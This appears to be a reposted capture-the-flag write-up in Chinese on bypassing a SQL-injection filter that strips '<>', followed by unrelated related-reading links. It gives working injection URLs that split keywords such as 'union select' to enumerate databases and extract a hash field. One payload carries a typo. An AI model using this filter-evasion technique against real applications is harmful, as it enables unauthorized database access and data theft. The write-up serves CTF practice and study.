• [一] sqlinject bypass

    http://103.238.227.13:10087/?id=1

    由源码来看是没有办法注入的,几乎都是过滤了的。但是经过测试加<>符号会被直接替换为空。

    那么就可以借助此进行bypass

    http://103.238.227.13:10087/?id=1 a<>nd 1=1%23

    http://103.238.227.13:10087/?id=1 a<>nd 1=2%23

    http://103.238.227.13:10087/?id=1 o<>rder b<>y 2%23 得是2

    查看所有库

    http://103.238.227.13:10087/?id=-1%20un%3C%3Eion%20se%3C%3Elect%201,concat(group_concat(distinct+schema_name))%20fr%3C%3Eom%20info%3C%3Ermation_schema.schemata--+

    得到两个库information_schema、sql3

    第一个是系统默认的那么直接上sql3。题目当中说在sql3这个表里的hash字段当中。那么直接

    http://103.238.227.13:10087/?id=-1 uni<>on selec<>t  1,hash fo<>m sql3.key%23
  • 相关阅读:
    git 多人协作
    git 版本管理
    git 安装配置
    git 忽略文件
    git 分支管理
    linux文件管理 文件操作
    linux文件管理 文件搜索
    linux文件管理 文件权限
    linux系统管理 基本指令
    003.html
  • 原文地址:https://www.cnblogs.com/nul1/p/8849139.html
Copyright © 2020-2023  润新知